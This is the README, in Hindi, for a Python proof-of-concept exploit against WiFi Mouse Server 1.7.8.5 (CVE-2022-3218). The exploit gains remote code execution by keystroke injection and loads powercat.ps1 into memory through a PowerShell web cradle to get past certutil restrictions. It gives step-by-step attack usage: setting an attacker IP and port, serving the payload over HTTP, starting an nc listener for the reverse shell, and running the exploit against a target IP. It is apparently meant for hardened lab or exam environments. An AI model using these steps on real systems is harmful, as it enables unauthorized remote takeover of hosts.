
WiFi Mouse Server 1.7.8.5 को लक्षित करने वाला CVE-2022-3218 के लिए PoC एक्सप्लॉइट, जो हार्डन्ड लैब्स के लिए कीस्ट्रोक इंजेक्शन और इन-मेमोरी PowerShell पेलोड डिलीवरी के माध्यम से RCE प्राप्त करता है।
WiFi Mouse Server v1.7.8.5 के लिए एक अनुकूलित Python 3 प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट। यह स्क्रिप्ट स्वचालित कीस्ट्रोक इंजेक्शन के माध्यम से रिमोट कोड निष्पादन (RCE) प्राप्त करने के लिए एक अंतर्निहित प्रोटोकॉल भेद्यता का लाभ उठाती है।
यह संस्करण विशेष रूप से लैब वातावरण के लिए संशोधित और अनुकूलित किया गया है, जहाँ पारंपरिक सार्वजनिक एक्सप्लॉइट्स होस्ट-हार्डनिंग बाधाओं (जैसे प्रतिबंधित certutil.exe निष्पादन या बाइनरी डाउनलोड अवरोधन) के कारण विफल हो जाते हैं।
cmd.exe और certutil.exe पर निर्भर करती है। हार्डन किए गए या आधुनिक परीक्षा/लैब संरचनाओं में, ये LOLBins अक्सर स्थानीय समूह नीतियों द्वारा प्रतिबंधित या अवरुद्ध होते हैं। यह संशोधित संस्करण वेक्टर को पूरी तरह से powercat.ps1 का उपयोग करके PowerShell वेब क्रेडल के माध्यम से मेमोरी में स्थानांतरित कर देता है।स्क्रिप्ट खोलें और फ़ाइल के शीर्ष पर स्थित कॉन्फ़िगरेशन वेरिएबल्स को अपनी स्थानीय वातावरण सेटिंग्स के साथ अपडेट करें:
rhost = sys.argv[1]
lhost = "192.168.45.167" # Your Attacker/Kali IP
lport = "443" # Your Netcat Listener Port
http_port = "80" # Your local HTTP Server Port hosting powercat
अपनी स्थानीय हमलावर मशीन पर एक निर्देशिका में powercat.ps1 होस्ट करें:
python3 -m http.server 80
एक अलग टर्मिनल टैब में, कॉन्फ़िगर किए गए lport पर अपना रिवर्स शेल लिसनर स्थापित करें:
nc -lvnp 443
लक्ष्य मशीन के IP पते के विरुद्ध स्क्रिप्ट निष्पादित करें:
python3 exploit.py <TARGET-IP>